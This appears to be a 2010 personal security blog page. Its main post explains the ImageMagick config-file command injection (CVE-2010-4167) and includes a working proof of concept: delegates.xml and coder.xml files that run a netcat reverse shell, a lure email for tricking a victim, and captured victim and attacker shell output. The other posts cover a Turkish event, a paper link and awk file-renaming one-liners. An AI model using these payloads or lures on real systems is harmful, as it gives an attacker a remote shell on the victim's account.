Thursday, December 30, 2010

Funny ImageMagic CMD Injection

Sometimes i don't read vendors vulnerability reports, because they are so boring and don't give technical information about vulnerability. Last day, i read Ubuntu Security Notice's vulnerability report and it seemed interesting. Firstly, i read description section, it says;
"It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges." [1]

After that i search for CVE ID of vulnerability "CVE-2010-4167". If i don't find anything i will be review diff files. But debian bug tracking pages help me. [2]
I always belive that, bug tracking systems always very usefull for finding security bugs/developing exploits.

The opened issue was true, when you create config files and run imagemagic, imagemagic looks current directory for config files, so if you can able to create malicious config file or your target run "convert" binary with your malicious config file, you can execute commands with current user privileges.

We create malicious xml config files, they are execute commands on currents users context. In example, i execute netcat for getting a reverse shell -) I send mail them to my victim;
"Hello dear, i need to convert my png file to jpg and i can't access my computer now, can you do it for me? I attached the png file.."

If my victim open it (for this case he will open :P ) my arbitrary codes will be executed on system.

Victim:
[victim@vmware:~/img]$ unzip please_convert.zip
... snipped ...
[victim@vmware:~/img]$ convert x.png a.jpg
convert: unable to open image `/tmp/magick-XXFJtZIk': No such file or directory @ blob.c/OpenBlob/2480.
convert: unable to open file `/tmp/magick-XXFJtZIk': No such file or directory @ constitute.c/ReadImage/569.
convert: missing an image filename `a.jpg' @ convert.c/ConvertImageCommand/2838.


Attacker:
[cb@lab:~/imagemagic-Xploi7]$ nc.traditional -lvvp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 37267
ls
coder.xml
delegates.xml
sshoos
xploit.txt
x.png
echo "owned :P"
owned :P
exit
 sent 24, rcvd 57



Here is the example delegate.xml file:
<delegatemap>
<delegate decode='png' command="nc.traditional -e /bin/sh 127.0.0.1 1337"/>
</delegatemap>

and here is the example coder.xml file:
<codermap>
<coder magick='png' name='notpng'/>
</codermap>


Note: delegate.xml file needs coder.xml for executing by imagemagic.

References:
[1] - http://www.ubuntu.com/usn/usn-1028-1
[2] - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=601824

Wednesday, December 29, 2010

Özgür Yazılım Günleri 2011

Özgür Yazılım Günleri 1-2 Nisan tarihlerinde, bir aksilik olmazsa bende katılacağım, katılacak arkadaşlarda isterlerse tanışma fırsatı yaratabiliriz. Sağ tarafada destek için logoyu koydum, merak edenler tıklasın okusun incelesin öğrensin.

Neyse görüşmek üzere :)

Thursday, December 16, 2010

Gelişmiş File Inclusion Saldırıları

Daha önceden yazdığım bir makale, ADEO Security Labs blogunda yayınlamıştık, sonunda PDF'e çevirip blogumada ekledim :>

Okumak isteyenler aşağıdaki adresten AFIA.pdf dosyasından erişebilirler.
https://sites.google.com/site/canberkbolat/papers

Saturday, December 11, 2010

awk awk

Yazmayali uzun zaman olmus :) awk ile ugrastim biraz cok eglenceli tavsiye edebilirim :) sunu yaptim kisaca; bir dizindeki mp3 dosyalarinin isimlerinden istenmeyen karakterleri yok ettim once ( "_" tiksindigim bi karakterdir). sed ile'de yapilabilir ben awk'la yaptim onu yazicam :]

ls | awk -F. '{a=$0; gsub(/_/," "); gsub(/-/," - "); print "mv \""a"\" \""$1".mp3\"";}' | sh

Güzel olsunlar diyede "-" karakterinin sagina ve solunada bosluk ekledim ayni komutla. Pipe'i bash'e yonlendirdimki mv komutlarini islesin. Daha sonra PHP'den aşina olunulan ucfirst uygulayayim dedim. awk'ta biraz gicikmis ucfirst turevi bi olay :) Onuda aşağıdaki komutla hallettim;

ls | awk -F. 'BEGIN {RS=" "; FS=""; ORS=" "; OFS="";} {$1=toupper($1); print $0;};' | awk -F. '{print "mv \""tolower($0)"\" \""$0"\""}' | sh

Tamamdirrr, artik dosyalarim istedigim gibi gozukuyor :)
hcr@world:~/desktop/Dexter - Soundtracks$ ls 01*
01 - Rolfe Kent - Dexter Main Title.mp3

Evet duzene ve kontrole cok onem veriyorum..